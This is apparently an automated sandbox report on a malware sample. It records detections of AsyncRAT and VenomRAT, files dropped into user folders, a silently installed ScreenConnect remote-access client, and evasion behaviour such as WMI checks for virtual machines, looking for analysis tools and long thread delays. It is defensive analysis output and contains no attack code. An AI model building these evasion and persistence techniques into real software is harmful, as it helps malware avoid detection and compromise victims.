                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Yara detected AsyncRAT
                            Source: Yara matchFile source: 27.2.newpoveno.exe.24b5482b0a0.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 22.2.newpoveno.exe.143e7c2b0a0.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.newpoveno.exe.24b5482b0a0.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 22.2.newpoveno.exe.143e7c2b0a0.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 24.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000018.00000002.1404363596.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.1457296209.0000024B54800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.1457520059.0000028BF6771000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000016.00000002.1377288428.00000143E7C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000016.00000002.1377470156.00000184897D1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.1260747029.000001F356151000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.1260524140.000001B2B2C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: newpoveno.exe PID: 5140, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: newpoveno.exe PID: 7468, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: newpoveno.exe PID: 7724, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\SystemRootDoc\nasrallah_x86.dll, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\invoice_temp\nasrallah_x86.dll, type: DROPPED
                            Yara detected VenomRAT
                            Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7548, type: MEMORYSTR
                            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                            Source: newpoveno.exe, 00000008.00000002.1260747029.000001F356151000.00000004.00001000.00020000.00000000.sdmp, newpoveno.exe, 00000008.00000002.1260524140.000001B2B2C00000.00000004.00001000.00020000.00000000.sdmp, newpoveno.exe, 00000016.00000002.1377288428.00000143E7C00000.00000004.00001000.00020000.00000000.sdmp, newpoveno.exe, 00000016.00000002.1377470156.00000184897D1000.00000004.00001000.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.1404363596.0000000000402000.00000040.00000400.00020000.00000000.sdmp, newpoveno.exe, 0000001B.00000002.1457296209.0000024B54800000.00000004.00001000.00020000.00000000.sdmp, newpoveno.exe, 0000001B.00000002.1457520059.0000028BF6771000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeMemory allocated: 1B2AE1E0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeMemory allocated: 1B2AE200000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeMemory allocated: 1F346150000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeMemory allocated: 1F366150000 memory reserve | memory write watchJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 2EA0000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 3090000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 5090000 memory reserve | memory write watch
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeMemory allocated: 143E3450000 memory reserve | memory write watch
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeMemory allocated: 184797D0000 memory reserve | memory write watch
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeMemory allocated: 184797D0000 memory reserve | memory write watch
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeMemory allocated: 184997D0000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 17D0000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 31E0000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 3100000 memory reserve | memory write watch
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeMemory allocated: 24B50210000 memory reserve | memory write watch
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeMemory allocated: 24B50230000 memory reserve | memory write watch
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeMemory allocated: 28BE6770000 memory reserve | memory write watch
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeMemory allocated: 28C06770000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 16A0000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 30D0000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 2F10000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeMemory allocated: 14E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeMemory allocated: 2EB0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeMemory allocated: 2DD0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeMemory allocated: 65E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeMemory allocated: 5DE0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeMemory allocated: 65E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeMemory allocated: 75E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeMemory allocated: 85E0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeMemory allocated: 1900000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeMemory allocated: 1EC0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeMemory allocated: 3EC0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsClient.exeMemory allocated: 1370000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsClient.exeMemory allocated: 1AE40000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeMemory allocated: 860000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeMemory allocated: 2380000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeMemory allocated: 21B0000 memory reserve | memory write watch
                            Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4866Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4833Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 586
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 9247
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4872
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWindow / User API: threadDelayed 8812
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWindow / User API: threadDelayed 894
                            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSICABB.tmpJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Windows.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\ScreenConnect.Core.dllJump to dropped file
                            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Client.dllJump to dropped file
                            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Core.dllJump to dropped file
                            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC5F8.tmpJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBE65.tmpJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.dllJump to dropped file
                            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\ScreenConnect.Windows.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeAPI coverage: 4.0 %
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeAPI coverage: 3.8 %
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeAPI coverage: 3.8 %
                            Source: C:\Windows\System32\svchost.exe TID: 4772Thread sleep time: -30000s >= -30000sJump to behavior
                            Source: C:\Windows\System32\svchost.exe TID: 7092Thread sleep time: -30000s >= -30000sJump to behavior
                            Source: C:\Windows\System32\svchost.exe TID: 5312Thread sleep time: -30000s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5740Thread sleep count: 4866 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5760Thread sleep count: 4833 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6092Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5940Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7632Thread sleep time: -24903104499507879s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7588Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7812Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6588Thread sleep count: 4872 > 30
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6732Thread sleep time: -9223372036854770s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6600Thread sleep count: 127 > 30
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6668Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Document.exe TID: 6964Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe TID: 7256Thread sleep count: 56 > 30
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe TID: 7088Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 3024Thread sleep count: 54 > 30
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 3024Thread sleep time: -540000s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 7848Thread sleep count: 8812 > 30
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 7048Thread sleep count: 894 > 30
                            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile Volume queried: C:\ FullSizeInformation
